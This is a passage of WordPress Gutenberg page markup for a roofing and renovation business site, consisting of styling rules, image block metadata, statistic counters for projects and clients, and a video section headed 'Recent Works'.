.skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">341+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Projects Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"6b12791c-0422-4fd5-afdb-743de813f280\"} -->\n<style type=\"text/css\"> .block-6b12791c-0422-4fd5-afdb-743de813f280 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6b12791c-0422-4fd5-afdb-743de813f280 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6b12791c-0422-4fd5-afdb-743de813f280 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6b12791c-0422-4fd5-afdb-743de813f280 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6b12791c-0422-4fd5-afdb-743de813f280 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6b12791c-0422-4fd5-afdb-743de813f280\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"1dc4517d-60d4-498d-b5f8-05c6b761c25e\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"6a895e67-fb7e-485b-ad64-1dca51a18e5b\"} -->\n<style type=\"text/css\"> .block-6a895e67-fb7e-485b-ad64-1dca51a18e5b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6a895e67-fb7e-485b-ad64-1dca51a18e5b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6a895e67-fb7e-485b-ad64-1dca51a18e5b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6a895e67-fb7e-485b-ad64-1dca51a18e5b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6a895e67-fb7e-485b-ad64-1dca51a18e5b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6a895e67-fb7e-485b-ad64-1dca51a18e5b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"27d4a194-b2dc-4dbb-a8f5-390309e75841\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">Our</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Qualified Satff</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe\",\"topPadding\":100,\"topPaddingMobile\":60,\"topPaddingTablet\":80,\"bottomPadding\":0,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-6\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-6 skt-blocks-block-section-outer-wrap block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 60px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"d4365c9c-8542-4cda-bf8d-13d6a10eb2a9\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":64,\"subHeadingTitleFontSizeMobile\":34,\"subHeadingTitleFontSizeTablet\":50,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-desc-text {\n font-size: 64px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-desc-text {\n font-size: 50px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-desc-text {\n font-size: 34px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\">We’re Providing Premium<br>Roofing Services</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/video-popup {\"videoLink\":\"https://www.youtube.com/embed/7er8Dz9JaO0\",\"vidheight\":300,\"opacity\":0,\"counterId\":\"b9c1ce98-590e-4510-a141-94e3d465168a\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-b9c1ce98-590e-4510-a141-94e3d465168a .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: 300px; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-b9c1ce98-590e-4510-a141-94e3d465168a .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-b9c1ce98-590e-4510-a141-94e3d465168a .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n</style><div class=\"skt-blocks-block-b9c1ce98-590e-4510-a141-94e3d465168a skt-blocks-video-popup alignundefined\"><div class=\"skt-blocks-video-popup__wrapper\" data-video=\"7er8Dz9JaO0\" style=\"border-width:1px;border-style:none;box-shadow:0px 0px   undefined \"><a href=\"#\" class=\"skt-blocks-video-popup__overlay\"></a><span class=\"skt-blocks-video-popup__play-button\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"30\" height=\"30\" viewBox=\"0 0 256 320\" style=\"width:30px;height:30px;fill:#ffffff;opacity:1\"><path d=\"M0 0v320l256-160L0 0z\"></path></svg></span></div></div>\n<!-- /wp:skt-blocks/video-popup --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"900cc149-4ce4-480a-b809-9965902c3d14\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":98,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-8\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-8 skt-blocks-block-section-outer-wrap block-900cc149-4ce4-480a-b809-9965902c3d14 background-type-color alignundefined\" 